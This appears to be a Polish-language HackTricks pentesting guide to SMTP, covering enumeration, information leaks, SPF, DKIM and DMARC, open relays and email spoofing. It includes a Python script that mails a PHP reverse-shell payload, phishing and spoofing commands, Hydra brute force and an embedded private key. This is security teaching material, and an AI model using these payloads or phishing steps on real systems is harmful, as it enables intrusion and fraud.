25,465,587 - Pentesting SMTP/s
Reading time: 18 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Podstawowe informacje
Simple Mail Transfer Protocol (SMTP) to protokół wykorzystywany w ramach zestawu TCP/IP do wysyłania i odbierania e-maili. Z powodu swoich ograniczeń w kolejkowaniu wiadomości po stronie odbiorcy, SMTP często jest stosowany razem z POP3 lub IMAP. Te dodatkowe protokoły umożliwiają użytkownikom przechowywanie wiadomości na serwerze pocztowym i okresowe ich pobieranie.
W praktyce, powszechnie zdarza się, że programy e-mailowe wykorzystują SMTP do wysyłania e-maili, podczas gdy korzystają z POP3 lub IMAP do ich odbierania. W systemach opartych na Unix, sendmail wyróżnia się jako najczęściej używany serwer SMTP do celów e-mailowych. Komercyjny pakiet znany jako Sendmail obejmuje serwer POP3. Ponadto, Microsoft Exchange oferuje serwer SMTP i daje możliwość dodania wsparcia dla POP3.
Domyślny port: 25,465(ssl),587(ssl)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
NAGŁÓWKI EMAIL
Jeśli masz możliwość sprawić, aby ofiara wysłała ci email (na przykład za pomocą formularza kontaktowego na stronie), zrób to, ponieważ możesz dowiedzieć się o wewnętrznej topologii ofiary, oglądając nagłówki maila.
Możesz również uzyskać email z serwera SMTP, próbując wysłać do tego serwera email na nieistniejący adres (ponieważ serwer wyśle do atakującego wiadomość NDN). Ale upewnij się, że wysyłasz email z dozwolonego adresu (sprawdź politykę SPF) i że możesz odbierać wiadomości NDN.
Powinieneś również spróbować wysłać różne treści, ponieważ możesz znaleźć bardziej interesujące informacje w nagłówkach, takie jak: X-Virus-Scanned: by av.domain.com
Powinieneś wysłać plik testowy EICAR.
Wykrycie AV może pozwolić ci na wykorzystanie znanych luk.
Podstawowe działania
Zbieranie banerów/Podstawowe połączenie
SMTP:
nc -vn <IP> 25
SMTPS:
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
Znajdowanie serwerów MX organizacji
dig +short mx google.com
Enumeracja
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
NTLM Auth - Ujawnienie informacji
Jeśli serwer obsługuje autoryzację NTLM (Windows), możesz uzyskać wrażliwe informacje (wersje). Więcej informacji tutaj.
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
Lub zautomatyzuj to za pomocą wtyczki nmap smtp-ntlm-info.nse
Nazwa serwera wewnętrznego - Ujawnienie informacji
Niektóre serwery SMTP automatycznie uzupełniają adres nadawcy, gdy polecenie "MAIL FROM" jest wydawane bez pełnego adresu, ujawniając swoją wewnętrzną nazwę:
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
Sniffing
Sprawdź, czy możesz przechwycić jakieś hasło z pakietów do portu 25
Auth bruteforce
Enumeracja Bruteforce Nazw Użytkowników
Uwierzytelnienie nie zawsze jest potrzebne
RCPT TO
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
VRFY
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown
EXPN
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost
Narzędzia automatyczne
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
DSN Reports
Raporty powiadomień o statusie dostawy: Jeśli wyślesz email do organizacji na nieprawidłowy adres, organizacja powiadomi, że adres był nieprawidłowy, wysyłając wiadomość z powrotem do Ciebie. Nagłówki zwróconego emaila będą zawierać możliwe wrażliwe informacje (takie jak adres IP usług pocztowych, które miały kontakt z raportami lub informacje o oprogramowaniu antywirusowym).
Commands
Wysyłanie emaila z konsoli linux
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
<phishing message>
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
Wysyłanie wiadomości e-mail za pomocą Pythona
Kod Pythona tutaj
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))
SMTP Smuggling
Luka SMTP Smuggling pozwala na ominięcie wszystkich zabezpieczeń SMTP (sprawdź następny rozdział, aby uzyskać więcej informacji na temat zabezpieczeń). Aby uzyskać więcej informacji na temat SMTP Smuggling, sprawdź:
{{#ref}} smtp-smuggling.md {{#endref}}
Środki zaradcze przeciwko fałszowaniu wiadomości e-mail
Organizacje są chronione przed wysyłaniem nieautoryzowanych e-maili w ich imieniu poprzez stosowanie SPF, DKIM i DMARC z powodu łatwości fałszowania wiadomości SMTP.
Pełny przewodnik po tych środkach zaradczych jest dostępny pod adresem https://seanthegeek.net/459/demystifying-dmarc/.
SPF
caution
SPF został "wycofany" w 2014 roku. Oznacza to, że zamiast tworzyć rekord TXT w _spf.domain.com
, tworzysz go w domain.com
, używając tej samej składni.
Ponadto, aby ponownie wykorzystać wcześniejsze rekordy spf, dość powszechne jest znalezienie czegoś takiego jak "v=spf1 include:_spf.google.com ~all"
Framework Polityki Nadawcy (SPF) to mechanizm, który umożliwia Agentom Transferu Poczty (MTA) weryfikację, czy host wysyłający e-mail jest autoryzowany, sprawdzając listę autoryzowanych serwerów pocztowych zdefiniowanych przez organizacje. Lista ta, która określa adresy IP/zakresy, domeny i inne podmioty autoryzowane do wysyłania e-maili w imieniu nazwy domeny, zawiera różne "Mechanizmy" w rekordzie SPF.
Mechanizmy
Z Wikipedia:
Mechanizm | Opis |
---|---|
ALL | Zawsze pasuje; używane do domyślnego wyniku, takiego jak -all dla wszystkich IP, które nie pasują do wcześniejszych mechanizmów. |
A | Jeśli nazwa domeny ma rekord adresowy (A lub AAAA), który można rozwiązać do adresu nadawcy, będzie pasować. |
IP4 | Jeśli nadawca znajduje się w danym zakresie adresów IPv4, pasuje. |
IP6 | Jeśli nadawca znajduje się w danym zakresie adresów IPv6, pasuje. |
MX | Jeśli nazwa domeny ma rekord MX, który rozwiązuje się do adresu nadawcy, będzie pasować (tj. poczta pochodzi z jednego z przychodzących serwerów pocztowych domeny). |
PTR | Jeśli nazwa domeny (rekord PTR) dla adresu klienta znajduje się w danej domenie i ta nazwa domeny rozwiązuje się do adresu klienta (potwierdzona odwrotna DNS), pasuje. Ten mechanizm jest odradzany i powinien być unikany, jeśli to możliwe. |
EXISTS | Jeśli podana nazwa domeny rozwiązuje się do jakiegokolwiek adresu, pasuje (niezależnie od adresu, do którego się rozwiązuje). Rzadko jest używane. Wraz z makrojęzykiem SPF oferuje bardziej złożone dopasowania, takie jak zapytania DNSBL. |
INCLUDE | Odnosi się do polityki innej domeny. Jeśli polityka tej domeny przechodzi, ten mechanizm przechodzi. Jednak jeśli dołączona polityka nie przechodzi, przetwarzanie trwa. Aby w pełni delegować do polityki innej domeny, należy użyć rozszerzenia przekierowania. |
REDIRECT | Przekierowanie to wskaźnik do innej nazwy domeny, która hostuje politykę SPF, pozwala na współdzielenie tej samej polityki SPF przez wiele domen. Jest to przydatne, gdy pracuje się z dużą ilością domen, które dzielą tę samą infrastrukturę e-mailową. Polityka SPF domeny wskazanej w mechanizmie przekierowania będzie używana. |
Możliwe jest również zidentyfikowanie Kwalifikatorów, które wskazują co należy zrobić, jeśli mechanizm pasuje. Domyślnie używany jest kwalifikator "+" (więc jeśli jakikolwiek mechanizm pasuje, oznacza to, że jest dozwolony).
Zazwyczaj zauważysz na końcu każdej polityki SPF coś takiego jak: ~all lub -all. Używa się tego, aby wskazać, że jeśli nadawca nie pasuje do żadnej polityki SPF, powinieneś oznaczyć e-mail jako nieufny (~) lub odrzucić (-) e-mail.
Kwalifikatory
Każdy mechanizm w polityce może być poprzedzony jednym z czterech kwalifikatorów, aby określić zamierzony wynik:
+
: Odpowiada wynikowi PASS. Domyślnie mechanizmy zakładają ten kwalifikator, co sprawia, że+mx
jest równoważnemx
.?
: Reprezentuje wynik NEUTRAL, traktowany podobnie jak NONE (brak konkretnej polityki).~
: Oznacza SOFTFAIL, stanowiąc kompromis między NEUTRAL a FAIL. E-maile spełniające ten wynik są zazwyczaj akceptowane, ale odpowiednio oznaczone.-
: Wskazuje FAIL, sugerując, że e-mail powinien być odrzucany.
W nadchodzącym przykładzie ilustrowana jest polityka SPF google.com. Zauważ włączenie polityk SPF z różnych domen w pierwszej polityce SPF:
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
Tradycyjnie możliwe było podszywanie się pod każdą nazwę domeny, która nie miała poprawnego/żadnego rekordu SPF. Obecnie, jeśli email pochodzi z domeny bez ważnego rekordu SPF, prawdopodobnie zostanie automatycznie odrzucony/oznaczony jako nieufny.
Aby sprawdzić SPF domeny, możesz użyć narzędzi online, takich jak: https://www.kitterman.com/spf/validate.html
DKIM (DomainKeys Identified Mail)
DKIM jest wykorzystywany do podpisywania wychodzących emaili, co umożliwia ich weryfikację przez zewnętrzne Agenty Przesyłania Poczty (MTA) poprzez pobranie publicznego klucza domeny z DNS. Ten publiczny klucz znajduje się w rekordzie TXT domeny. Aby uzyskać dostęp do tego klucza, należy znać zarówno selektor, jak i nazwę domeny.
Na przykład, aby zażądać klucza, niezbędne są nazwa domeny i selektor. Można je znaleźć w nagłówku maila DKIM-Signature
, np. d=gmail.com;s=20120113
.
Polecenie do pobrania tych informacji może wyglądać następująco:
dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
DMARC (Domain-based Message Authentication, Reporting & Conformance)
DMARC zwiększa bezpieczeństwo e-maili, opierając się na protokołach SPF i DKIM. Określa zasady, które kierują serwerami pocztowymi w obsłudze e-maili z określonej domeny, w tym jak radzić sobie z niepowodzeniami uwierzytelniania i gdzie wysyłać raporty o działaniach związanych z przetwarzaniem e-maili.
Aby uzyskać rekord DMARC, musisz zapytać subdomenę _dmarc
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
DMARC tags
Tag Name | Purpose | Sample |
---|---|---|
v | Wersja protokołu | v=DMARC1 |
pct | Procent wiadomości podlegających filtrowaniu | pct=20 |
ruf | URI raportowania dla raportów sądowych | ruf=mailto:authfail@example.com |
rua | URI raportowania zbiorczych raportów | rua=mailto:aggrep@example.com |
p | Polityka dla domeny organizacyjnej | p=quarantine |
sp | Polityka dla subdomen domeny OD | sp=reject |
adkim | Tryb dopasowania dla DKIM | adkim=s |
aspf | Tryb dopasowania dla SPF | aspf=r |
Co z subdomenami?
Z tutaj.
Musisz mieć oddzielne rekordy SPF dla każdej subdomeny, z której chcesz wysyłać e-maile.
Poniższe informacje pierwotnie opublikowano na openspf.org, które było świetnym źródłem tego typu informacji.
Pytanie Demon: Co z subdomenami?
Jeśli otrzymam e-mail z pielovers.demon.co.uk, a nie ma danych SPF dla pielovers, czy powinienem cofnąć się o jeden poziom i przetestować SPF dla demon.co.uk? Nie. Każda subdomena w Demon to inny klient, a każdy klient może mieć swoją własną politykę. Nie miałoby sensu, aby polityka Demona dotyczyła wszystkich jego klientów domyślnie; jeśli Demon chce to zrobić, może ustawić rekordy SPF dla każdej subdomeny.
Dlatego rada dla wydawców SPF jest następująca: powinieneś dodać rekord SPF dla każdej subdomeny lub nazwy hosta, która ma rekord A lub MX.
Strony z rekordami A lub MX wildcard powinny również mieć rekord SPF wildcard w formie: * IN TXT "v=spf1 -all"
To ma sens - subdomena może znajdować się w zupełnie innej lokalizacji geograficznej i mieć bardzo różną definicję SPF.
Open Relay
Kiedy e-maile są wysyłane, zapewnienie, że nie zostaną oznaczone jako spam, jest kluczowe. Często osiąga się to poprzez użycie serwera relay, który jest zaufany przez odbiorcę. Jednak powszechnym wyzwaniem jest to, że administratorzy mogą nie być w pełni świadomi, które zakresy IP są bezpieczne do zezwolenia. Ta niewiedza może prowadzić do błędów w konfiguracji serwera SMTP, co jest ryzykiem często identyfikowanym w ocenach bezpieczeństwa.
Obejściem, które niektórzy administratorzy stosują, aby uniknąć problemów z dostarczaniem e-maili, szczególnie w odniesieniu do komunikacji z potencjalnymi lub obecnymi klientami, jest zezwolenie na połączenia z dowolnego adresu IP. Osiąga się to poprzez skonfigurowanie parametru mynetworks
serwera SMTP, aby akceptował wszystkie adresy IP, jak pokazano poniżej:
mynetworks = 0.0.0.0/0
Aby sprawdzić, czy serwer pocztowy jest otwartym przekaźnikiem (co oznacza, że może przekazywać e-maile z dowolnego zewnętrznego źródła), powszechnie używane jest narzędzie nmap
. Zawiera ono specjalny skrypt zaprojektowany do testowania tego. Polecenie do przeprowadzenia szczegółowego skanowania na serwerze (na przykład z adresem IP 10.10.10.10) na porcie 25 za pomocą nmap
to:
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
Narzędzia
- https://github.com/serain/mailspoof Sprawdź błędy w konfiguracji SPF i DMARC
- https://pypi.org/project/checkdmarc/ Automatycznie pobierz konfiguracje SPF i DMARC
Wyślij fałszywy e-mail
Lub możesz użyć narzędzia:
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
warning
Jeśli napotkasz jakikolwiek błąd podczas używania biblioteki dkim python przy analizowaniu klucza, śmiało użyj tego poniższego.
UWAGA: To jest tylko brudne rozwiązanie do szybkich sprawdzeń w przypadkach, gdy z jakiegoś powodu klucz prywatny openssl nie może być analizowany przez dkim.
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----
Lub możesz to zrobić ręcznie:
# To wyśle niesigned wiadomość
mail("your_email@gmail.com", "Test Subject!", "hej! To jest test", "From: administrator@victim.com");
Więcej informacji
Znajdź więcej informacji na temat tych zabezpieczeń w https://seanthegeek.net/459/demystifying-dmarc/
Inne wskaźniki phishingu
- Wiek domeny
- Linki prowadzące do adresów IP
- Techniki manipulacji linkami
- Podejrzane (niezwykłe) załączniki
- Uszkodzona treść e-maila
- Wartości używane, które różnią się od nagłówków wiadomości
- Istnienie ważnego i zaufanego certyfikatu SSL
- Zgłoszenie strony do witryn filtrujących treści internetowe
Ekstrakcja przez SMTP
Jeśli możesz wysyłać dane przez SMTP przeczytaj to.
Plik konfiguracyjny
Postfix
Zazwyczaj, jeśli jest zainstalowany, w /etc/postfix/master.cf
znajdują się skrypty do wykonania gdy na przykład nowa wiadomość e-mail zostanie odebrana przez użytkownika. Na przykład linia flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}
oznacza, że /etc/postfix/filtering
zostanie wykonane, jeśli nowa wiadomość e-mail zostanie odebrana przez użytkownika mark.
Inne pliki konfiguracyjne:
sendmail.cf
submit.cf
Odniesienia
- https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
- https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
Automatyczne polecenia HackTricks
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
https://book.hacktricks.xyz/pentesting/pentesting-smtp
Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25
Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.